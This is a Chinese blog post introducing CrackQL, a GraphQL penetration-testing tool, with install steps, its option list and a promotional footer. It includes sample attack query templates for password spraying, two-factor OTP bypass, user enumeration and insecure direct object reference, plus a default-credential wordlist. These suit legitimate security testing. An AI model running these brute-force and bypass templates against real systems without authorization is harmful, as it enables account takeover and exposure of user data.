CrackQL:一款功能强大的图形化密码爆破和模糊测试工具

已于 2023-10-13 17:12:32 修改
阅读量266 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: web安全 网络安全 安全 文章标签: 前端 运维 安全
于 2023-01-29 20:58:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/text2204/article/details/128794145

关于CrackQL

CrackQL是一款功能强大的图形化密码爆破和模糊测试工具,在该工具的帮助下,广大研究人员可以针对密码安全和应用程序安全进行渗透测试。

除此之外,CrackQL同时也是一款通用的GraphQL渗透测试工具,它可以控制速率限制和其他分析控制技术来对目标系统进行凭证爆破和模糊测试等操作,以测试程序的安全性。

问题咨询和282G网络安全资料的领取点击此处即可

工具运行机制

CrackQL的工作原理是将单个GraphQL查询或变异自动批量处理为多个别名操作,该工具可以根据CSV输入变量确定要使用的别名数。在以编程方式生成分批GraphQL文档后,CrackQL然后会分批并将Payload发送到目标GraphQL
API,并解析结果和错误信息。

工具依赖组件

Python3

Requests

GraphQL

Jinja

工具安装

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone git@github.com:nichola*saleks/CrackQL.git

接下来,利用项目提供的requirements.txt文件安装该工具所需的依赖组件:

pip install -r requirements.txt

工具运行

查看帮助信息

python3 CrackQL.py -h

 

Options:

  -h, --help             显示工具帮助信息和退出

  -t URL, --target=URL   目标GraphQL节点的URL路径

  -q QUERY, --query=QUERY

                        指定输入查询或编译操作

  -i INPUT_CSV, --input-csv=INPUT_CSV

                        输入CSV列表的文件路径

  -d DELIMITER, --delimiter=DELIMITER

                        CSV输入分隔符,默认:“,”

  -o OUTPUT_DIRECTORY, --output-directory=OUTPUT_DIRECTORY

                        存储结果的输出目录,默认:./results/[domain]_[uuid]/

  -b BATCH_SIZE, --batch-size=BATCH_SIZE

                        每次GraphQL文档请求的批量操作数量,默认:100

  -D DELAY, --delay=DELAY

                        批量请求发送的时间间隔,默认:0

  --verbose           启用工具Verbose模式

  -v, --version         输出工具当前版本和退出

使用样例

python3 CrackQL.py -t http://example.com/graphql -q sample-queries/login.graphql -i sample-inputs/usernames_and_passwords.csv

工具使用演示

密码喷射爆破

sample-queries/login.graphql

mutation {

  login(username: {{username|str}}, password: {{password|str}}) {

    accessToken

  }

}

双因素身份验证OTP绕过

sample-queries/otp-bypass.graphql

mutation {

  twoFactor(otp: {{otp|int}}) {

    accessToken

  }

}

用户账号枚举

sample-queries/enumeration.graphql

query {

  signup(email: {{email|str}}, password: {{password|str}}) {

    user {

      email

    }

  }

}

不安全的直接对象引用

sample-queries/idor.graphql

query {

  profile(uuid: {{uuid|int}}) {

    name

    email

    picture

  }

}

字典Payload

sample-inputs/usernames_and_passwords.csv

username, password

admin, admin

admin, password

admin, pass

admin, pass123

admin, password123

operator, operator

operator, password

operator, pass

operator, pass123

operator, password123

最后

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

点击此处即可领取282G网络安全学习资料


同时每个成长路线对应的板块都有配套的视频提供:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

问题咨询和资料的领取点击此处即可

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值